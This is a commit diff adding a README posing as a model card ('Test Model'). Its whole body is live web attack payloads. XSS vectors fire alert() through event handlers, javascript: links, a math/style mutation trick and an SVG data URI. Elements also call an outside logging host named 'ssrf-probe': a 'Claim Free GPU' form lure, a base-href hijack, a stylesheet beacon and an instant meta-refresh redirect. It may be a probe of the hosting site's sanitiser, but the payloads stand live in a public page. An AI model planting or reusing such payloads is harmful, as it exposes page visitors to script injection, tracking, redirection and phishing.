Add XSS test README
Browse files
README.md
ADDED
|
@@ -0,0 +1,28 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: mit
|
| 3 |
+
---
|
| 4 |
+
|
| 5 |
+
# Test Model
|
| 6 |
+
|
| 7 |
+
<details open ontoggle=alert(document.domain)>
|
| 8 |
+
<summary>Click me</summary>
|
| 9 |
+
Test
|
| 10 |
+
</details>
|
| 11 |
+
|
| 12 |
+
<img src=x onerror=alert(document.domain)>
|
| 13 |
+
|
| 14 |
+
[click me](javascript:alert(1))
|
| 15 |
+
|
| 16 |
+
<a href="javascript:alert(1)">XSS Link</a>
|
| 17 |
+
|
| 18 |
+
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
|
| 19 |
+
|
| 20 |
+
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'><a xlink:href='javascript:alert(1)'><rect width='100' height='100'/></a></svg>#x" />
|
| 21 |
+
|
| 22 |
+
<form action="https://firstaccount69-ssrf-probe.hf.space/log?source=form"><input type="submit" value="Claim Free GPU"></form>
|
| 23 |
+
|
| 24 |
+
<base href="https://firstaccount69-ssrf-probe.hf.space/">
|
| 25 |
+
|
| 26 |
+
<link rel="stylesheet" href="https://firstaccount69-ssrf-probe.hf.space/log?source=css">
|
| 27 |
+
|
| 28 |
+
<meta http-equiv="refresh" content="0;url=https://firstaccount69-ssrf-probe.hf.space/log?source=meta">
|